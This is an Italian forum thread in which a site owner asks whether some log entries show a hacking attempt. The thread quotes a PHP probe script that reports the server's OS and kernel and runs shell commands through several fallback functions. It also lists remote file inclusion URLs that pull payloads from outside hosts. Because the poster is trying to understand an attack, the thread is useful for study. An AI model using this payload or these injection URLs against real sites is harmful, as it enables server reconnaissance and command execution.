Tentativo di hacking o cosa?

**mrcnet** · 21-11-2007, 18:09

mi risulta nelle statistiche un accesso da:

Libwww-perl 5.805 come Browser IP 193.142.214.114

e la pagina visitata è

http://www.miosito.it/index.php?mode...s000/test.txt?

dove in http://124.0.201.20/bbs000/test.txt?

c'è

codice:

<?
$dir = @getcwd();
$ker = @php_uname();
echo "31337
";
$OS = @PHP_OS;
echo "
OSTYPE:$OS
";
echo "
Kernel:$ker
";
$free = disk_free_space($dir); 
if ($free === FALSE) {$free = 0;} 
if ($free < 0) {$free = 0;} 
echo "Free:".view_size($free)."
"; 
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size) 
{ 
if (!is_numeric($size)) {return FALSE;} 
else 
{ 
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
else {$size = $size . " B";} 
return $size; 
}
}

cosa farebbe secondo voi quel codice?

**mrcnet** · 21-11-2007, 18:11

ho trovato altri accessi con url di questo tipo:

codice:

http://miosito.it/forum/viewtopic.php?f=3&amp;t=1489/comments-display-tpl.php?config[comments_form_tpl]=http://www.vagrantclan.com/uploads/on.txt?

http://miosito.it/forum/viewtopic.ph...s/cache/id.txt

http://miosito.it/forum/viewtopic.ph...kies/safe.gif?

Discussione: Tentativo di hacking o cosa?

Strumenti discussione

Ricerca discussione

Visualizza

Tentativo di hacking o cosa?

Permessi di invio